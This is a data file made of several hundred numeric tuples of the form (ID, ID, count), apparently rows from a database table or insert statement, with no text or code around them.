(24894170, 1538699446, 5),
(24894176, 786802763, 1),
(24894208, 1570674703, 1),
(24894208, 100662543, 1),
(24894208, 2366158608, 1),
(24894216, 1834516790, 4),
(24894230, 1375112542, 1),
(24894233, 2071807832, 1),
(24894293, 2760155399, 1),
(24894293, 96753435, 1),
(24894523, 1374841142, 2),
(24894657, 1123632467, 1),
(24894740, 2637637377, 2),
(24894763, 1123632436, 1),
(24894763, 1123632454, 2),
(24895050, 3652617267, 1),
(24895063, 1123632454, 1),
(24895090, 2901740117, 1),
(24895175, 1123632454, 1),
(24895256, 1584237938, 1),
(24895304, 1837860862, 1),
(24895316, 1753445547, 9),
(24895394, 1375112542, 1),
(24895426, 3652617232, 1),
(24895473, 2989639598, 2),
(24895616, 1539837611, 1),
(24895636, 2644818889, 1),
(24895651, 1374841142, 2),
(24895707, 2509962544, 1),
(24895792, 2509962544, 1),
(24895961, 676177835, 1),
(24895971, 1123632475, 1),
(24895987, 1152705560, 2),
(24896052, 1123632454, 1),
(24896108, 1123632437, 1),
(24896194, 1123633542, 1),
(24896242, 1123633542, 2),
(24896298, 1123633430, 1),
(24896298, 1123633542, 1),
(24896504, 1374841142, 1),
(24896526, 3252386809, 1),
(24896528, 3252386809, 1),
(24896560, 1123633542, 1),
(24896710, 2193201697, 2),
(24896820, 2366158852, 1),
(24896860, 757109195, 2),
(24896887, 1374841142, 2),
(24896921, 3024883593, 1),
(24896921, 3024883466, 1),
(24896922, 1324940073, 1),
(24896925, 3024883475, 1),
(24896925, 2297635928, 8),
(24896926, 2297635928, 3),
(24896930, 3475901715, 1),
(24896941, 2644818889, 1),
(24896942, 2644818889, 4),
(24896942, 1837372382, 1),
(24896944, 1837372382, 2),
(24896944, 2644818889, 2),
(24896945, 2644818889, 3),
(24896946, 1837372382, 2),
(24896947, 2644818889, 2),
(24896948, 2644818889, 4),
(24896949, 1837372382, 3),
(24896952, 676177851, 1),
(24897021, 3475901753, 2),
(24897061, 757109195, 2),
(24897117, 1837274001, 1),
(24897118, 1374841142, 2),
(24897127, 876263692, 2),
(24897164, 1837274001, 1),
(24897165, 1837274001, 1),
(24897167, 1837274001, 1),
(24897194, 1374841142, 1),
(24897233, 2366158608, 1),
(24897268, 1837482126, 1),
(24897345, 3024883474, 1),
(24897370, 1054099761, 1),
(24897376, 1374841142, 2),
(24897535, 1439290282, 1),
(24897538, 1439290282, 1),
(24897545, 2499535434, 1),
(24897602, 1123633542, 1),
(24897665, 2499535434, 1),
(24897667, 2584750011, 1),
(24897693, 3427775492, 1),
(24897735, 1539837019, 2),
(24897744, 1427728186, 3),
(24897750, 1427728186, 1),
(24897751, 1427728186, 7),
(24897864, 1406737396, 1),
(24898025, 520974919, 1),
(24898242, 1123633542, 2),
(24898374, 1123633542, 1),
(24898414, 2760155448, 1),
(24898414, 96753435, 1),
(24898466, 3267064321, 1),
(24898474, 676177775, 1),
(24898474, 676177851, 1),
(24898474, 3475901753, 3),
(24898491, 1538308269, 2),
(24898492, 1538308269, 1),
(24898547, 1123633542, 1),
(24898580, 1078646641, 1),
(24898583, 1374841142, 2),
(24898629, 1123633542, 1),
(24898661, 1374841142, 1),
(24898667, 1374841142, 1),
(24898728, 2303379820, 1),
(24898766, 2499535434, 1),
(24898787, 1123633555, 1),
(24898880, 1123633542, 1),
(24898886, 2499535434, 1),
(24898887, 856631529, 1),
(24898987, 786801763, 1),
(24898995, 2760155459, 1),
(24899195, 2637637377, 1),
(24899204, 532202074, 3),
(24899224, 3652617241, 1),
(24899250, 1123631302, 1),
(24899256, 3024883593, 1),
(24899320, 3472744462, 4),
(24899493, 3339975108, 2),
(24899493, 3250575437, 2),
(24899494, 3339975108, 1),
(24899494, 3250575437, 1),
(24899495, 3250575437, 1),
(24899654, 3242976508, 1),
(24899683, 3652617388, 1),
(24899871, 1123631302, 1),
(24899916, 676177851, 1),
(24899941, 1374841142, 2),
(24900161, 1375112542, 1),
(24900176, 1538628086, 1),
(24900245, 1834501559, 1),
(24900299, 1355389698, 1),
(24900389, 3657088733, 1),
(24900471, 2637637376, 1),
(24900532, 3475901715, 1),
(24900605, 3475901859, 1),
(24900638, 676177840, 2),
(24900657, 1374838938, 1),
(24900658, 1374838938, 2),
(24900688, 2499535434, 1),
(24900710, 3657088733, 1),
(24900763, 676177833, 1),
(24900824, 2499535434, 1),
(24900865, 1338304237, 1),
(24901095, 1338304237, 1),
(24901112, 3273261686, 1),
(24901117, 3273261686, 1),
(24901138, 1338304237, 1),
(24901186, 1123631302, 1),
(24901192, 1338304237, 1),
(24901274, 1338304237, 1),
(24901338, 1370049247, 1),
(24901382, 2996485381, 1),
(24901393, 1375112542, 1),
(24901418, 1338304237, 1),
(24901536, 1123631176, 1),
(24901536, 1123631302, 2),
(24901546, 2509959283, 1),
(24901564, 2637637395, 1),
(24901653, 1123631302, 1),
(24901661, 2366158866, 1),
(24901662, 2366148255, 1),
(24901688, 1123631302, 1),
(24901776, 1123631302, 1),
(24901800, 1123631302, 1),
(24901820, 1123631302, 1),
(24901934, 2760155412, 1),
(24901934, 96753435, 1),
(24901974, 1123631302, 1),
(24901989, 1123631302, 1),
(24902096, 1123631302, 1),
(24902164, 2509961939, 3),
(24902202, 1123635091, 1),
(24902268, 1123635091, 1),
(24902275, 2745977448, 1),
(24902276, 2745977448, 2),
(24902286, 676177752, 1),
(24902371, 1123635091, 1),
(24902651, 1375112542, 1),
(24902656, 1463923807, 1),
(24902657, 1463923807, 1),
(24902659, 1463923807, 1),
(24902660, 1463923807, 1),
(24902669, 1837474429, 1),
(24902670, 1837474429, 1),
(24902671, 1837474429, 4),
(24902671, 2521214255, 1),
(24902681, 1375112542, 1),
(24902727, 1375112542, 1),
(24902797, 1374841142, 1),
(24902816, 3492536660, 4),
(24902817, 3492536660, 5),
(24902898, 1834517617, 1),
(24902914, 1123635120, 1),
(24902951, 1375068314, 1),
(24902957, 2297635928, 8),
(24902958, 2297635928, 1),
(24903072, 2637637394, 2),
(24903155, 2637637394, 1),
(24903181, 1123635091, 1),
(24903335, 100662578, 1),
(24903336, 2945073626, 3),
(24903499, 2366158852, 1),
(24903556, 1815808070, 4),
(24903644, 1123635091, 1),
(24903669, 1123635016, 1),
(24903669, 1123635091, 1),
(24903735, 2961112076, 1),
(24903759, 2989643491, 1),
(24903760, 2989643491, 1),
(24903782, 1123635091, 2),
(24903792, 2513062086, 1),
(24903792, 1123635091, 1),
(24903838, 1538628281, 2),
(24904001, 676177754, 2),
(24904094, 3567661094, 2),
(24904115, 1152705560, 1),
(24904118, 1152705560, 1),
(24904154, 1554035825, 1),
(24904234, 3587417960, 2),
(24904235, 3587417960, 1),
(24904262, 3024883462, 1),
(24904329, 1123631302, 1),
(24904443, 1375112542, 1),
(24904448, 1375112542, 1),
(24904453, 1123631302, 1),
(24904468, 1834596154, 1),
(24904475, 1834596154, 3),
(24904512, 1837484288, 1),
(24904538, 1375112542, 1),
(24904585, 1123631302, 1),
(24904645, 2509961370, 2),
(24904646, 2509961370, 3),
(24904649, 2509961370, 2),
(24904717, 1123631302, 2),
(24904723, 676177671, 1),
(24904753, 1123631302, 1),
(24904814, 1123631302, 1),
(24904826, 1311661259, 1),
(24904907, 1123631302, 1),
(24904998, 1123631302, 1),
(24905038, 1123631302, 1),
(24905061, 1837931087, 3),
(24905062, 1837931087, 2),
(24905063, 1837931087, 1),
(24905066, 1123631302, 1),
(24905087, 96753435, 1),
(24905152, 1837924479, 1),
(24905168, 736163900, 1),
(24905231, 3427775560, 1),
(24905233, 3475901715, 1),
(24905310, 1123631302, 1),
(24905386, 1123631176, 1),
(24905386, 1123631302, 1),
(24905443, 2637637383, 2),
(24905448, 1796538632, 1),
(24905472, 3259896531, 2),
(24905473, 3259896531, 1),
(24905474, 3259896531, 2),
(24905475, 3259896531, 1),
(24905478, 3259896531, 2),
(24905618, 856638340, 1),
(24905620, 1123631302, 1),
(24905674, 1569621950, 1),
(24905683, 3024883617, 1),
(24905781, 2328459013, 2),
(24905839, 3024883482, 1),
(24905839, 3024883475, 1),
(24905890, 3652617392, 1),
(24905927, 1358487954, 10),
(24905957, 1374841142, 2),
(24906047, 1374781696, 1),
(24906052, 1374781696, 1),
(24906053, 1374781696, 2),
(24906167, 676177839, 1),
(24906193, 876257645, 2),
(24906241, 676177839, 1),
(24906448, 3473362978, 1),
(24906459, 3256644604, 1),
(24906476, 1123631313, 1),
(24906567, 1374841142, 2),
(24906752, 3242976508, 1),
(24906880, 1123631302, 1),
(24906907, 1464066970, 1),
(24906956, 3475901715, 1),
(24906962, 676177839, 1),
(24906962, 3475901715, 1),
(24906988, 1374769563, 1),
(24907012, 3475901859, 1),
(24907047, 1374841142, 2),
(24907169, 2509962560, 1),
(24907237, 1374841142, 2),
(24907246, 2996485390, 1),
(24907354, 1357699146, 1),
(24907434, 1374841142, 1),
(24907435, 1374841142, 1),
(24907456, 2919226301, 1),
(24907480, 1838094426, 1),
(24907482, 1838094426, 1),
(24907482, 1389669355, 1),
(24907483, 1389669355, 1),
(24907484, 1389669355, 1),
(24907621, 1837842937, 2),
(24907684, 2637637390, 1),
(24907949, 1338304137, 1),
(24907987, 1152705948, 1),
(24907988, 1152705948, 1),
(24907999, 1374769563, 1),
(24908021, 676177749, 2),
(24908052, 1538358342, 2),
(24908053, 1538358342, 1),
(24908055, 1538358342, 2),
(24908056, 1538358342, 1),
(24908057, 1538358342, 1),
(24908065, 1538358342, 3),
(24908076, 2760158144, 1),
(24908143, 1374841142, 2),
(24908189, 3475901715, 2),
(24908203, 1374841142, 2),
(24908258, 786802763, 1),
(24908258, 3475901698, 1),
(24908270, 1338304137, 1),
(24908377, 3250483553, 5),
(24908405, 2637637389, 2),
(24908425, 1338304137, 1),
(24908445, 2187902172, 4),
(24908446, 2187902172, 3),
(24908447, 2187902172, 4),
(24908448, 2187902172, 1),
(24908592, 1374769563, 1),
(24908594, 2509960075, 1),
(24908642, 1123631630, 1),
(24908655, 1338304137, 1),
(24908698, 1338304137, 1),
(24908752, 1338304137, 1),
(24908776, 1374769563, 1),
(24908795, 1374841142, 2),
(24908798, 1538510707, 1),
(24908834, 1338304137, 1),
(24908978, 1338304137, 1),
(24909022, 1439252500, 2),
(24909032, 2637637389, 1),
(24909333, 1247140480, 1),
(24909349, 1753419235, 6),
(24909350, 1753419235, 3),
(24909455, 1123638677, 1),
(24909455, 1123638679, 1),
(24909459, 632865533, 1),
(24909588, 632842500, 1),
(24909613, 2345094286, 1),
(24909627, 2995861269, 1),
(24909628, 2995861269, 1),
(24909666, 1374841142, 2),
(24909682, 1123631630, 1),
(24909722, 1123631646, 1),
(24909722, 1123631630, 1),
(24909752, 676177697, 2),
(24909796, 96753435, 1),
(24909796, 3652617247, 1),
(24909891, 2366145579, 1),
(24910043, 3024883615, 1),
(24910100, 3587417960, 1),
(24910196, 1123631816, 1),
(24910196, 1123631630, 2),
(24910236, 1123631630, 1),
(24910241, 1123631630, 1),
(24910256, 1374769563, 1),
(24910469, 1123634273, 1),
(24910489, 1123634273, 1),
(24910707, 1123631630, 1),
(24910723, 3475901849, 1),
(24910730, 3475901809, 1),
(24910773, 1123634273, 1),
(24910847, 1358347396, 1),
(24910869, 1358347396, 1),
(24911005, 1838104422, 1),
(24911167, 1834541323, 1),
(24911168, 1834541323, 1),
(24911201, 3024883486, 1),
(24911233, 1607842043, 2),
(24911234, 3024883477, 1),
(24911324, 1358347396, 1),
(24911325, 1358347396, 1),
(24911329, 1358347396, 1),
(24911391, 1358347396, 1),
(24911410, 1358347396, 1),
(24911419, 1358347396, 1),
(24911438, 2366148145, 1),
(24911438, 2366145567, 1),
(24911438, 1570674747, 1),
(24911460, 1358347396, 1),
(24911681, 1796538632, 1),
(24911728, 1374769563, 1),
(24911764, 1374841142, 2),
(24911831, 100662559, 1),
(24911901, 1358347396, 1),
(24912452, 783526296, 1),
(24912538, 2637637568, 1),
(24912563, 584016457, 2),
(24912566, 2955169831, 2),
(24912679, 3154466025, 1),
(24912864, 1123632438, 1),
(24912928, 3024883593, 1),
(24912950, 3652617236, 1),
(24912951, 96753435, 1),
(24913190, 1538649748, 1),
(24913259, 2637637568, 2),
(24913293, 1538626519, 2),
(24913293, 2918995415, 1),
(24913297, 1538626519, 5),
(24913305, 1374841142, 2),
(24913326, 1538626519, 1),
(24913410, 1123632437, 2),
(24913562, 1123632437, 1),
(24913604, 1053970255, 1),
(24913712, 1439270026, 1),
(24913744, 96260934, 2),
(24913745, 96260934, 5),
(24913755, 1123632584, 1),
(24913755, 1123632437, 1),
(24913838, 3154455105, 1),
(24913841, 1054099761, 1),
(24913855, 772030661, 4),
(24913856, 772030661, 5),
(24913867, 1123632437, 1),
(24913871, 1123632437, 1),
(24913926, 2763076217, 1),
(24913927, 1123632437, 1),
(24913981, 2637637384, 2),
(24914024, 96260878, 7),
(24914103, 1407831882, 1),
(24914225, 3267064321, 1),
(24914293, 1538461267, 3),
(24914318, 1374769563, 1),
(24914349, 1078646641, 1),
(24914405, 1123632437, 2),
(24914411, 1123632437, 1),
(24914497, 3587417960, 1),
(24914501, 1123632437, 1),
(24914547, 1123632437, 1),
(24914654, 783531305, 1),
(24914674, 1123633622, 1),
(24914701, 2637637384, 1),
(24914720, 1123633622, 1),
(24914729, 1538592159, 1),
(24914735, 2637637384, 1),
(24914749, 1123633622, 1),
(24914752, 1123633622, 1),
(24914762, 1123633622, 1),
(24914772, 1123633622, 1),
(24914784, 1123633622, 1),
(24914790, 1123633622, 1),
(24914795, 1123633622, 1),
(24914805, 1123633622, 1),
(24914816, 1123633622, 1),
(24914827, 1123633622, 1),
(24914836, 1123633622, 1),
(24914838, 1123633622, 1),
(24914849, 1123633622, 1),
(24914860, 1123633622, 1),
(24914898, 1123633622, 1),
(24914909, 1123633622, 1),
(24914912, 1123633622, 1),
(24914917, 1123633622, 1),
(24914920, 1123633622, 1),
(24914931, 1123633622, 1),
(24914942, 1123633622, 1),
(24914946, 2745959577, 1),
(24914953, 2731721858, 4),
(24914954, 1123633622, 1),
(24914966, 1123633622, 1),
(24914974, 1123633622, 1),
(24914976, 2637637627, 1),
(24915017, 3024883613, 1),
(24915034, 1123633622, 1),
(24915102, 2637637514, 1),
(24915103, 2637637514, 1),
(24915112, 2637637514, 1),
(24915115, 2637637514, 1),
(24915115, 1123633622, 1),
(24915163, 1374841142, 2),
(24915212, 1374769563, 1),
(24915235, 1374841142, 2),
(24915262, 1401140181, 1),
(24915351, 2509961901, 2),
(24915352, 2509961901, 1),
(24915401, 1053115180, 1),
(24915402, 1053115180, 2),
(24915455, 2637637379, 2),
(24915456, 2637637379, 1),
(24915488, 2783008832, 1),
(24915509, 1338303486, 1),
(24915524, 2809328531, 1),
(24915592, 632871405, 1),
(24915643, 96260885, 8),
(24915766, 783517035, 1),
(24915830, 1338303486, 1),
(24915842, 1077858855, 1),
(24915985, 1338303486, 1),
(24916032, 1374841142, 1),
(24916104, 1374769563, 1),
(24916167, 1123631313, 1),
(24916184, 676177839, 2),
(24916194, 3475901809, 1),
(24916215, 1338303486, 1),
(24916258, 1338303486, 1),
(24916278, 2954838202, 1),
(24916312, 1338303486, 1),
(24916394, 1338303486, 1),
(24916506, 96260903, 7),
(24916526, 3024883608, 1),
(24916526, 3024883590, 1),
(24916528, 3024883474, 1),
(24916538, 1338303486, 1),
(24916644, 1374769563, 1),
(24916779, 1374841142, 1),
(24916780, 1374841142, 1),
(24916846, 1375132497, 1),
(24916926, 3492536660, 8),
(24917010, 632936182, 1),
(24917071, 2503519569, 1),
(24917129, 2637637398, 2),
(24917179, 1374841142, 2),
(24917198, 872366417, 1),
(24917198, 96753435, 1),
(24917210, 1123631302, 2),
(24917285, 1584254022, 1),
(24917311, 1342987974, 1),
(24917315, 2297635928, 2),
(24917316, 2297635928, 2),
(24917319, 2297635928, 2),
(24917362, 1796538632, 1),
(24917423, 1374841142, 2),
(24917425, 1374769563, 1),
(24917426, 1834524421, 2),
(24917429, 1123631302, 1),
(24917444, 1538350214, 1),
(24917445, 1538350214, 1),
(24917446, 1538350214, 2),
(24917563, 1374841142, 2),
(24917588, 1123631302, 1),
(24917664, 1123633622, 1),
(24917781, 1123633622, 1),
(24917787, 1538452237, 2),
(24917849, 2637637398, 2),
(24918076, 1539837019, 2),
(24918246, 786801764, 1),
(24918270, 3488736748, 1),
(24918461, 3267064321, 1),
(24918556, 1538646836, 1),
(24918571, 1834607884, 2),
(24918571, 2637637399, 2),
(24918602, 2637637399, 2),
(24918622, 783539426, 1),
(24918689, 2499535434, 1),
(24918756, 532202074, 1),
(24918810, 2499535434, 1),
(24918895, 1123633622, 2),
(24918896, 1374841142, 2),
(24918898, 1374769563, 1),
(24918910, 1374769563, 1),
(24918973, 1374841142, 1),
(24918974, 1374841142, 1),
(24918990, 2637637621, 1),
(24919047, 1123633622, 1),
(24919107, 676177735, 1),
(24919275, 1123633629, 1),
(24919275, 1123633622, 1),
(24919336, 1123633622, 1),
(24919355, 2637637390, 2),
(24919387, 1123633622, 1),
(24919433, 1123631594, 1),
(24919433, 1123633622, 1),
(24919468, 1123633622, 1),
(24919525, 1374769563, 1),
(24919545, 1123633622, 1),
(24919590, 1123633622, 1),
(24919610, 1123633622, 1),
(24919734, 1323276251, 1),
(24919735, 1323276251, 1),
(24919805, 1123633622, 1),
(24919830, 1123633622, 1),
(24919831, 1123633622, 1),
(24919836, 1123633622, 1),
(24919837, 2503517245, 1),
(24919844, 2366145586, 1),
(24919846, 1123633622, 1),
(24919877, 1123633622, 1),
(24919912, 1123633622, 1),
(24919957, 920718086, 1),
(24919963, 1123633622, 1),
(24919979, 1123633622, 1),
(24920000, 1439270754, 1),
(24920009, 1123633622, 2),
(24920040, 1123633622, 1),
(24920169, 2499535434, 1),
(24920213, 872366374, 1),
(24920213, 96753435, 1),
(24920285, 2637637526, 3),
(24920289, 2499535434, 1),
(24920345, 1123635091, 2),
(24920463, 1374841142, 2),
(24920478, 1123635091, 2),
(24920525, 3024883609, 1),
(24920646, 2733899714, 1),
(24920658, 1123635091, 1),
(24920790, 1123635091, 1),
(24920896, 1123635091, 1),
(24920906, 1123635091, 1),
(24920959, 3652617387, 1),
(24920999, 632825899, 1),
(24921011, 1374841142, 2),
(24921097, 1374841142, 2),
(24921140, 1123635016, 1),
(24921140, 1123635091, 1),
(24921150, 3154448177, 1),
(24921159, 3154448177, 1),
(24921164, 3154448177, 1),
(24921240, 3652617288, 1),
(24921262, 1123635091, 1),
(24921282, 1123635091, 1),
(24921344, 1374841142, 2),
(24921358, 1123635091, 1),
(24921445, 1123635091, 1),
(24921496, 1123635091, 1),
(24921623, 1123635091, 1),
(24921658, 1123635091, 1),
(24921781, 1837876689, 2),
(24921790, 1374769563, 1),
(24921905, 2637637494, 2),
(24922145, 1123631630, 1),
(24922146, 1123631630, 1),
(24922336, 621375790, 1),
(24922515, 3024883481, 1),
(24922627, 2637637401, 2),
(24922691, 1374769563, 1),
(24922784, 1123631630, 1),
(24922844, 1374769563, 1),
(24922860, 3024883476, 1),
(24922957, 1094179366, 1),
(24923024, 1123631693, 2),
(24923069, 3657086469, 1),
(24923117, 1374841142, 2),
(24923177, 1538654468, 1),
(24923184, 1439301535, 3),
(24923348, 2637637396, 1),
(24923390, 3657086469, 1),
(24923464, 2328173131, 9),
(24923544, 1123631732, 1),
(24923545, 3657086469, 1),
(24923548, 2637637424, 1),
(24923715, 1123631693, 2),
(24923775, 3657084349, 1),
(24923818, 3657084349, 1),
(24923872, 3657084349, 1),
(24923913, 1123631693, 1),
(24923954, 3657084349, 1),
(24923969, 3267064321, 1),
(24923989, 1123631693, 1),
(24924020, 1427844213, 2),
(24924025, 3003111232, 2),
(24924026, 3003111232, 2),
(24924070, 2637637538, 1),
(24924098, 3657084349, 1),
(24924111, 1123631816, 1),
(24924111, 1123631693, 1),
(24924127, 3495879255, 1),
(24924131, 2499535434, 1),
(24924133, 3242976508, 1),
(24924171, 1538458305, 1),
(24924200, 1123631693, 1),
(24924253, 1123631693, 1),
(24924273, 1538512707, 2),
(24924299, 3166481419, 1),
(24924320, 1123631693, 1),
(24924383, 2644818889, 1),
(24924489, 1123633622, 1),
(24924632, 1374769563, 1),
(24924647, 1374843811, 4),
(24924696, 1538567300, 3),
(24924753, 3492536661, 2),
(24924754, 3492536661, 6),
(24924760, 1374841142, 2),
(24924778, 1123633622, 1),
(24924851, 3003111232, 1),
(24924905, 1123633622, 1),
(24925201, 1123633622, 1),
(24925288, 96753435, 1),
(24925420, 2366145562, 1),
(24925659, 2499535434, 1),
(24925776, 3154495934, 1),
(24925796, 2499535434, 1),
(24925839, 1815808080, 4),
(24925939, 2637637398, 2),
(24925939, 2503517245, 1),
(24926144, 1374769563, 1),
(24926206, 1538608887, 1),
(24926220, 2760155467, 1),
(24926265, 1374841142, 2),
(24926541, 3024883617, 1),
(24926660, 2637637400, 1),
(24926683, 1123633555, 1),
(24927094, 1374769563, 1),
(24927216, 3024883461, 1),
(24927227, 1570674747, 1),
(24927229, 786801765, 1),
(24927290, 2954838202, 1),
(24927451, 1374841142, 2),
(24927461, 1375117429, 2),
(24927466, 1375117429, 2),
(24927469, 1375117429, 2),
(24927517, 1374769563, 1),
(24927525, 2637637424, 1),
(24927603, 2637637424, 1),
(24927673, 1161474618, 2),
(24927674, 1161474618, 7),
(24927826, 3024883603, 1),
(24927970, 1123634231, 1),
(24928274, 1374769563, 1),
(24928343, 1374841142, 2),
(24928403, 1374841142, 2),
(24928515, 3024883471, 1),
(24928520, 1374769563, 1),
(24928548, 3024883600, 1),
(24928552, 3475901894, 2),
(24928587, 1374769563, 1),
(24928898, 1538596638, 1),
(24929120, 1123633950, 1),
(24929150, 1123632579, 1),
(24929150, 1123633950, 1),
(24929273, 2637637388, 2),
(24929283, 1123633950, 1),
(24929421, 1123633950, 1),
(24929460, 1123633950, 1),
(24929499, 2499535434, 1),
(24929537, 872366418, 1),
(24929537, 96753435, 1),
(24929557, 2366145567, 1),
(24929577, 1123633950, 1),
(24929602, 1123633950, 1),
(24929607, 1123633950, 1),
(24929636, 2499535434, 1),
(24929653, 1123632542, 1),
(24929668, 1123632542, 1),
(24929679, 1374769563, 1),
(24929698, 1123632542, 1),
(24929750, 1374769563, 1),
(24929779, 1123632542, 1),
(24929789, 1123632542, 1),
(24929825, 1374769563, 1),
(24929835, 1123632542, 1),
(24929896, 1123632542, 1),
(24929921, 1123632542, 1),
(24929992, 876183356, 1),
(24929993, 876183356, 1),
(24929994, 2637637405, 2),
(24930047, 1834609551, 5),
(24930048, 1834609551, 2),
(24930049, 1834609551, 2),
(24930202, 3587417960, 1),
(24930375, 872366427, 1),
(24930491, 876055784, 1),
(24930494, 2996485392, 1),
(24930629, 1338303462, 1),
(24930714, 2637637509, 1),
(24930776, 2637637406, 3),
(24930814, 2303381350, 1),
(24930950, 1338303462, 1),
(24931105, 3657083455, 1),
(24931146, 1834609551, 3),
(24931157, 1374769563, 1),
(24931267, 2809283056, 9),
(24931268, 2809283056, 2),
(24931283, 1123632542, 1),
(24931335, 3657083455, 1),
(24931378, 3657083455, 1),
(24931432, 3657083455, 1),
(24931514, 3657083455, 1),
(24931556, 1374841142, 2),
(24931653, 1053970098, 10),
(24931658, 3657083455, 1),
(24931693, 3024883599, 1),
(24931872, 918820966, 3),
(24931874, 1374769563, 1),
(24932338, 3472744983, 4),
(24932538, 2637637376, 1),
(24932542, 2637637583, 1),
(24932573, 1538656104, 2),
(24932681, 2637637583, 1),
(24932737, 2509950143, 2),
(24932738, 2509950143, 1),
(24932876, 1374769563, 1),
(24932911, 1123631300, 2),
(24933007, 2071807860, 1),
(24933035, 3373404845, 1),
(24933045, 2071807778, 1),
(24933045, 2071806940, 1),
(24933050, 1584238868, 1),
(24933121, 2637637583, 1),
(24933199, 3024883483, 1),
(24933225, 2509961690, 1),
(24933237, 1450079886, 2),
(24933251, 2366145579, 1),
(24933259, 3475901901, 2),
(24933303, 1374769563, 1),
(24933488, 3024883617, 1),
(24933981, 3475901898, 2),
(24933985, 520974917, 1),
(24934027, 1374841142, 2),
(24934052, 2637637583, 1),
(24934104, 3116152550, 1),
(24934190, 1123631300, 1),
(24934215, 1123631300, 1),
(24934225, 1123631171, 1),
(24934225, 1123631300, 1),
(24934240, 1343201817, 1),
(24934296, 1123631300, 1),
(24934306, 1123631300, 1),
(24934316, 1538375237, 1),
(24934317, 1538375237, 1),
(24934453, 3587417960, 1),
(24934504, 1374769563, 1),
(24934521, 1055638166, 1),
(24934583, 3492536660, 7),
(24934583, 3492536661, 1),
(24934612, 2297635928, 2),
(24934613, 2297635928, 5),
(24934614, 2297635928, 3),
(24934617, 2297635928, 2),
(24934620, 1489403232, 1),
(24934691, 1374769563, 1),
(24934701, 2637637390, 2),
(24934706, 2745959577, 1),
(24934729, 1374841142, 1),
(24934730, 1374841142, 1),
(24934775, 1123631300, 2),
(24934827, 1374761077, 1),
(24934847, 1123631300, 1),
(24934885, 1834549080, 4),
(24934886, 1834549080, 1),
(24934887, 1834549080, 6),
(24934917, 786801765, 1),
(24934943, 1123631300, 1),
(24934953, 1123631300, 1),
(24934964, 2637637583, 2),
(24934989, 1123631300, 1),
(24935422, 2637637376, 2),
(24935604, 3154485134, 1),
(24935607, 1463941451, 1),
(24935694, 3154485134, 1),
(24935739, 3652617366, 1),
(24935739, 96753435, 1),
(24935751, 3154485134, 1),
(24935949, 1538774996, 2),
(24935979, 1356207873, 1),
(24936071, 1538656104, 2),
(24936116, 1123631300, 1),
(24936142, 2637637376, 2),
(24936208, 1374769563, 1),
(24936249, 3154459133, 1),
(24936300, 1837280593, 3),
(24936378, 1123631300, 2),
(24936500, 1815808070, 3),
(24936501, 1815808070, 1),
(24936524, 1123631300, 1),
(24936545, 872367984, 1),
(24936598, 3024883478, 1),
(24936598, 3024883610, 1),
(24936600, 3024883617, 1),
(24936627, 676177711, 1),
(24936637, 1123631300, 1),
(24936880, 1539837019, 2),
(24936917, 1582084616, 3),
(24936973, 1538728574, 2),
(24936974, 1538728574, 2),
(24937040, 1123631171, 1),
(24937040, 1123631300, 1),
(24937209, 2637637376, 2),
(24937211, 1837280593, 1),
(24937240, 2996488252, 1),
(24937240, 2996488256, 2),
(24937241, 1374769563, 1),
(24937449, 2499535434, 1),
(24937562, 1374769563, 1),
(24937650, 1570674724, 1),
(24937768, 1753435673, 8),
(24937769, 1753435673, 1),
(24937927, 3024883468, 1),
(24937930, 3475901896, 1),
(24938144, 2637637417, 1),
(24938189, 3657085691, 1),
(24938264, 1374769563, 1),
(24938319, 1053970255, 1),
(24938348, 3475901750, 2),
(24938349, 3475901750, 1),
(24938391, 2731721828, 2),
(24938510, 3657085691, 1),
(24938574, 2303380418, 1),
(24938636, 1538656104, 2),
(24938650, 3475901896, 1),
(24938665, 3657085691, 1),
(24938842, 3625177169, 1),
(24938854, 1538656104, 2),
(24938895, 3657085691, 1),
(24938927, 1538656104, 2),
(24938938, 3657085691, 1),
(24938992, 3657085691, 1),
(24939021, 1374769563, 1),
(24939028, 3024883611, 1),
(24939034, 1374769563, 1),
(24939035, 1374839056, 4),
(24939036, 1374839056, 6),
(24939037, 1374839056, 1),
(24939074, 3657085691, 1),
(24939095, 3024883471, 1),
(24939218, 3657085691, 1),
(24939372, 2637637526, 1),
(24939409, 1123635012, 2),
(24939436, 1123635012, 1),
(24939463, 1123635012, 1),
(24939486, 1123635012, 1),
(24939509, 1123635012, 1),
(24939530, 1123635012, 1),
(24939550, 1123635012, 1),
(24939570, 1123635012, 1),
(24939611, 2637637583, 1),
(24939680, 1374769563, 1),
(24939720, 1538614733, 1),
(24939813, 3342489299, 1),
(24939814, 3342489299, 1),
(24939829, 3242976508, 1),
(24939836, 2995852746, 1),
(24939861, 1771904328, 3),
(24939862, 1771904328, 2),
(24939863, 1771904328, 1),
(24939910, 783487407, 1),
(24939935, 1538773687, 2),
(24940092, 2637637401, 2),
(24940405, 2637637583, 1),
(24940414, 1053976392, 1),
(24940416, 621375751, 1),
(24940416, 2996488251, 1),
(24940464, 2509960045, 1),
(24940513, 2745959577, 1),
(24940523, 2493742914, 3),
(24940565, 1123631300, 1),
(24940601, 1123631300, 1),
(24940728, 1123631171, 1),
(24940728, 1123631300, 1),
(24940789, 1123631300, 1),
(24940813, 2637637401, 2),
(24940866, 1123631300, 2),
(24940896, 1123631300, 1),
(24941085, 1123631300, 1),
(24941174, 1123631300, 1),
(24941194, 1538457750, 1),
(24941195, 1538457750, 7),
(24941197, 1538457750, 1),
(24941202, 1538457750, 1),
(24941235, 1570674758, 1),
(24941387, 1123631300, 1),
(24941534, 2637637401, 1),
(24941538, 1837280593, 1),
(24941544, 621375758, 1),
(24941767, 1374769563, 1),
(24941768, 1796538632, 1),
(24941808, 3024883598, 1),
(24941974, 2509961569, 1),
(24942072, 1123633540, 1),
(24942073, 1539837082, 1),
(24942078, 2366148185, 1),
(24942124, 1837280593, 2),
(24942190, 1584253342, 2),
(24942254, 2637637401, 1),
(24942270, 1123633540, 1),
(24942370, 1123633540, 1),
(24942532, 2303381358, 1),
(24942532, 96753435, 1),
(24942610, 1374769563, 1),
(24942975, 3475901867, 1),
(24943370, 1374769563, 3),
(24943435, 1123631300, 1),
(24943447, 1837280593, 2),
(24943634, 1123631300, 1),
(24943663, 2954838202, 1),
(24943717, 1768391530, 1),
(24943734, 3644879299, 1),
(24943741, 3115168388, 1),
(24943837, 1123631171, 1),
(24943837, 1123631300, 2),
(24943854, 100662570, 1),
(24943873, 1123631309, 1),
(24943922, 2637637377, 2),
(24943927, 3024883466, 1),
(24943927, 3024883486, 1),
(24943942, 676177679, 1),
(24944008, 1123631300, 1),
(24944008, 2366148185, 1),
(24944008, 2366148131, 1),
(24944039, 1121751541, 1),
(24944053, 3024883477, 1),
